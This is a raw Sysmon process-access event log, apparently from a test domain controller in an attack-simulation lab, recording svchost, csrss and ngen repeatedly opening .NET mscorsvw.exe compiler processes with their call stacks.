13:23:59.768{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-3003-000000009A01}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.753{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-3003-000000009A01}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.753{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-3003-000000009A01}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.737{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2F03-000000009A01}2976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.737{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2F03-000000009A01}2976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.737{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2F03-000000009A01}2976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.721{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2E03-000000009A01}4452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.706{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2E03-000000009A01}4452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.706{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2E03-000000009A01}4452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.690{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2D03-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.674{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2D03-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.674{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2D03-000000009A01}3020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.659{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2C03-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.659{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2C03-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.659{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2C03-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.643{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2B03-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.628{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2B03-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.628{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2B03-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.612{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2A03-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.612{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2A03-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.612{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2A03-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.596{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2903-000000009A01}2620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.581{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2903-000000009A01}2620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 